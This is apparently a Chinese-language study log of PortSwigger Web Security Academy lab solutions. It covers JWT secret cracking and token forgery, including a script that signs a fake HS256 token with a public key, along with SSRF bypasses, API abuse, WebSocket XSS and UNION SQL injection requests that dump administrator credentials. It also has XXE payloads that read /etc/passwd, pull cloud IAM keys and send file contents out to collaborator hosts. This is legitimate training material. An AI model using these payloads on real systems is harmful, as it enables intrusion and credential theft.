x. JWT身份验证
爆破弱secret
HS256 对称加密他会使用同一个秘钥来加解密,RS256 非对称加密他会使用公私钥加密或者解密
使用jwt_tool这个python项目来尝试爆破 https://github.com/ticarpi/jwt_tool,使用jwt_tool-2.2.7搭配python 3.10版本
eyJraWQiOiJlZTUzMTMwYy0xN2Q5LTQ1MDctYmEwMi04NDUxYzYzZTg4ZGIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc3OTk4NTQ0OCwic3ViIjoid2llbmVyIn0.A_J9Iv7aL7UgRzPU_V6v_8vYJ7QdcA8bbysRDNhaz5c
{
"kid": "ee53130c-17d9-4507-ba02-8451c63e88db",
"alg": "HS256"
}
。。。
F:\桌面\tools\jwt\jwt_tool-2.2.7>python ./jwt_tool.py eyJraWQiOiIyNzY5OTY0MC1iMDRiLTQ3YjMtYmI1NS04ODA0Yjc1NDkzZGIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc4MDAxNzkxMCwic3ViIjoid2llbmVyIn0.DWsPFYvZEGNIl563KxCw3Y3XRegiNf6mBn8j7Yz5B_E -C -d F:\桌面\tools\dict\100k-most-used-passwords-NCSC.txt
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
Original JWT:
[+] secret1 is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "secret1"
F:\桌面\tools\jwt\jwt_tool-2.2.7>
# 得到正确的secret后通过jwt editor进行粘贴秘钥调整payload即可进行测试jwk头部参数注入
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection
{
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
"typ": "JWT",
"alg": "RS256",
"jwk": {
"kty": "RSA",
"e": "AQAB",
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
"n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m"
}
}需要使用JWT Editor来生成一个新的 RSA key
回到重放器repeater选择json web token点attack选第一个再选择刚才生成的jwk,再调整一下payload为administrator即可
kid头目录遍历绕过
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal
先到jwt editor生成一个对称加密,点generate后修改k的值为AA==他就Base64 编码的空字节,然后点ok即可
kid头每次都试验加一个../回到上一级尝试访问/dev/null ,有需要自动变更payload内容,每次变更后都需要点击Sign点ok后即可发起重放攻击看结果
jku 头部注入绕过
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection
先使用jwt editor创建一个非对称秘钥并且复制成为jwk set集合
来到portswigger提供的在线例子https://exploit-0aab00fb044e53af809e5789015800bc.exploit-server.net/ 将复制的jwk set集合放到body里面去点击store保存,他就相当于是一个小文件,等会就远程引用这个jku地址,达到绕过目的,需要留意jwk set集中的kid值,等会需要用到
修改kid 新增jku内容为上面的地址 调整payload为 administrator 最后点击sign签名选择最开始的那份非对称秘钥点ok,即可发起重放,可以看到通过了
算法混淆绕过 JWT 身份验证
https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion
已知道他会提供一个/jwks.json 这就是泄露源,通过json格式化提取里面的内容,利用jwt editor生成rsa非对称秘钥
将主体jwks复制到jwt editor中创建rsa非对称秘钥,粘贴到jwk中,然后切换到pem 复制内容到decode转码成base64
从decoder中复制base64,回到jwt editor中创建对称加密将base64替换到k
调整payload为administrator 签名选择最后的对称秘钥 头部更新参数alg即可重放测试
RS256 非对称加密泄漏绕过
在泄露得到私钥加密的情况下,可以直接使用jwt editor创建非对称加密放入pem中即可
相反如果没法得到加密秘钥,但是得到了验证verify秘钥,这个时候可以尝试将RS256变更为对称加密HS256或许可以绕过
const jwt = require('jsonwebtoken');
const fs = require('fs');
// 读取公钥文件
const publicKey = fs.readFileSync('./public.key', 'utf8');
// 构造 payload
const payload = {
user: 'admin'
};
// 关键:使用 HS256 算法,用公钥作为密钥进行签名
const fakeToken = jwt.sign(payload, publicKey, { algorithm: 'HS256' });
console.log('伪造的 JWT Token:');
console.log(fakeToken);
console.log('\n使用方法:');
console.log(`curl -X POST http://目标地址/ -b "auth=${fakeToken}"`);
x. SSRF 绕过
url=http://0/flag.php
url=http://127.1/flag.php
url=http://127%2e1/flag.php
# 指向自己的域名,但是域名解析是127.0.0.1
url=http://test.tanqidi.com/flag.phpx. API 攻防
利用文档攻击 API 端点
https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation
用dirsearch扫一遍看到有/api访问看到了接口调用详情
Output File: F:\BaiduNetdiskDownload\V3.0\v3\tools\gui_scan\dirsearch\reports\https_0a7000780367cd4082e8a254003e002b.web-security-academy.net\__26-06-01_11-21-38.txt
Target: https://0a7000780367cd4082e8a254003e002b.web-security-academy.net/
[11:21:38] Starting:
[11:24:36] 302 - 0B - /api -> /api/
[11:24:36] 200 - 1KB - /api/
[11:24:36] 404 - 41B - /api/2/explore/
[11:24:36] 404 - 41B - /api/2/issue/createmeta
[11:24:36] 404 - 41B - /api/__swagger__/
看他是RESTFul风格的api,支持GET DELETE PATCH 可以在burpsuite拼接成为GET或者DELETE /api/user/carlos 即可删除用户过关
查找并利用未使用的 API 端点
https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint
看文档要求是利用api来实现零元购,登录后抓包看到有/api/products/1/price这个商品接口,它响应了json 推测他是RESTFul Api 对它发起PUT提示只支持GET与PATCH 换成PATCH后将它先前响应的json给放到body里面,再将它需要的Content-Type: application/json; charset=utf-8 放到头部 重放后成功修改为0元,添加进购物车下单,通过
利用批量赋值漏洞
x. GraphQL 渗透
可以为burpsuite添加inql插件,发现graphql入口直接通过拓展过去分析一波,如果没有被拦截会有很多有用的接口,假设被拦截可以使用以下注入命令来尝试获取结构
https://graphql.cn/learn/introspection/
https://nathanrandal.com/graphql-visualizer/
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
有些接口是隐藏的,默认不公开只有正确发起功能请求才能看到,这种情况可以尝试使用burp scan来尝试扫描一下,或许能有意料之外的结果,再配合graphql注入命令来获取schema结果导出成为json在inql中加载json就能顺利看到接口结构
x. WebSockets 渗透
x. 操纵 WebSocket 消息以利用漏洞
靶场直接提交xss语句会被转义,在burp中拦截消息再加入原始的语句 <img src=1 onerror='alert(1)'> 即可触发xss弹窗
x. sql 注入
片段均为burpsuite抓包,使用sqlmap是没有灵魂的
https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data
GET /filter?category=Pets' or 1=1 -- -
https://portswigger.net/web-security/sql-injection/lab-login-bypass
账号:administrator' -- -
密码:随意
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle
# 确定有几个字段
GET /filter?category=Gifts' order by 2 -- - HTTP/2
# 因为是Oracle联合注入select他必须强制from一张表的,就用dual
GET /filter?category=Gifts' union select null,null from dual -- - HTTP/2
# Oracle的版本不是函数,而是叫v$version 并且它是一个类似表的存在,是有字段的,叫BANNER
GET /filter?category=Gifts' union select BANNER,null from v$version -- - HTTP/2
# 也可以优雅用别名,但是Oracle不支持as,可以这样用 简单
GET /filter?category=Gifts' union select v.BANNER,null from v$version v -- - HTTP/2
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft
# 确定有几个字段
GET /filter?category=Gifts' order by 2 -- - HTTP/2
# 尝试获取版本与用户,版本即可以用version()也可以尝试用@@version
GET /filter?category=Gifts' union select version(),current_user() -- - HTTP/2
# PostgreSQL 联合注入跨表获取数据
https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle
# 确定有几个字段
GET /filter?category=Pets' order by 2 -- - HTTP/2
# 确定字段响应类型
GET /filter?category=Pets' union select '','' -- - HTTP/2
# 确定数据库类型 PostgreSQL 12.22 (Ubuntu 12.22-0ubuntu0.20.04.4) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0, 64-bit
GET /filter?category=Pets' union select '',version() -- - HTTP/2
# 尝试获取所有表,因为是PostgreSQL 似乎与MySQL的注入方式不太一样
GET /filter?category=Pets' union select '',table_name from information_schema.tables -- - HTTP/2
# 看上面获取所有表,大概率是users_sizrfm这个表,获取这个表的字段
GET /filter?category=' union select '', column_name from information_schema.columns where table_name = 'users_sizrfm' -- - HTTP/2
# 按响应的字段拼接获取数据,成功获取administrator的数据
GET /filter?category=' union select '', concat(username_cewpwj, ' ', password_yxzfim, ' ', email) from users_sizrfm -- - HTTP/2
GET /filter?category=' union select '', concat_ws(' ', username_cewpwj, password_yxzfim, email) from users_sizrfm -- - HTTP/2
https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
# 确定列数
GET /filter?category=' order by 3 -- - HTTP/2
# 看题目3个null占列即可完成题目
GET /filter?category=' union select null,null,null -- - HTTP/2
# 要求是按实验室界面给出的随机值给注入到字段里面
https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text
# 确认列数
GET /filter?category=Gifts' order by 3 -- - HTTP/2
# 注入随机值
GET /filter?category=Gifts' union select null,'05WHKI',null -- - HTTP/2
# 根据之前学到的知识,联合注入获取其他表的内容获取administrator账号密码
https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
# 确定列数
GET /filter?category=Gifts' order by 2 -- - HTTP/2
# 尝试获取所有表,因为是PostgreSQL 似乎与MySQL的注入方式不太一样
GET /filter?category=Pets' union select '',table_name from information_schema.tables -- - HTTP/2
# 看结果尝试获取users表字段
GET /filter?category=Pets' union select '', column_name from information_schema.columns where table_name = 'users' -- - HTTP/2
# 获取数据, 成功看到administrator账号密码
GET /filter?category=' union select '', concat_ws(' ', username, password, email) from users -- - HTTP/2
# 练习联合注入多字段合一响应
https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column
# 确定列数
GET /filter?category=Pets' order by 2 -- - HTTP/2
# 确定列类型,第二个列是字符串,后续多合一结果利用concat_ws响应在里面
GET /filter?category=Pets' union select 1,'hello' -- - HTTP/2
# 获取表
GET /filter?category=Pets' union select 1,table_name from information_schema.tables -- - HTTP/2
# 获取字段
GET /filter?category=Pets' union select 1, column_name from information_schema.columns where table_name = 'users' -- - HTTP/2
# 获取数据, 成功看到administrator账号密码
GET /filter?category=Pets' union select 1, concat_ws(' ', username, password, email) from users -- - HTTP/2
# 盲注
https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
x. XXE
常规实体:定义后必须在 XML 标签内用 &实体名; 调用,执行后会将内容直接嵌入到标签位置,适合有回显的文件读取。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<stockCheck>
<productId>&xxe;6</productId>
<storeId>1</storeId>
</stockCheck>参数实体:定义后仅在 DTD 内部用 %实体名; 调用,用于盲 XXE 探测或通过嵌套 DTD 将数据带外发送到攻击者服务器,标签内无需任何调用。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY % xxe SYSTEM "http://69d7ngspgi04f3ti791yxt7vdmjd742sr.oastify.com">
%xxe;
]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>#
https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files
# 似乎是最简单的方式了
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<stockCheck>
<productId>&xxe;6</productId>
<storeId>1</storeId>
</stockCheck>
https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf
# 利用 XXE 进行 SSRF 攻击,直接可以云上攻击了,从 EC2 元数据端点获取服务器的 IAM 秘密访问密钥
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck>
<productId>1&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction
# 通过带外通道交互的盲 XXE 攻击,此场景它不回显 但是可以通过 collaborator 来识别是否触发请求从而判断是否存在ssrf
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://0rsmmy61furn0831avuqzz5h88ez2uqj.oastify.com"> ]>
<stockCheck>
<productId>1&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities
# 带 % 的参数实体,通过xml参数实体进行外带交互的盲式xxe攻击,因为如果用前面的都是&xxe;放在字段里面,校验可能会直接失败,不能用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY % xxe SYSTEM "http://69d7ngspgi04f3ti791yxt7vdmjd742sr.oastify.com">
%xxe;
]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>
https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration
# 利用盲式XXE漏洞通过恶意外部DTO来窃取数据,进主页先到Go to exploit server生成文件复制地址,http为burpsuite提供的collaborator地址
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://s2vtg2lb94tq8pm40vukqf0h68cz0rsfh.oastify.com/?x=%file;'>">
%eval;
%exfil;
# 来到burp重放器远程地址填写靶场提供的文件地址,内部就是dtd内容了
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0afd0032044b4b8c80972f14010300df.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>
https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages
# 利用盲式XXE漏洞通过错误信息获取数据,和上面一样,进主页先到Go to exploit server生成文件复制地址
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
# 来到burp重放器远程地址填写靶场提供的文件地址,内部就是dtd内容了
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ad4001b0473ed8c81d7c48e01020051.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
<productId>3</productId>
<storeId>1</storeId>
</stockCheck>
https://portswigger.net/web-security/xxe/lab-xinclude-attack
# 利用xinclude来获取文件
评论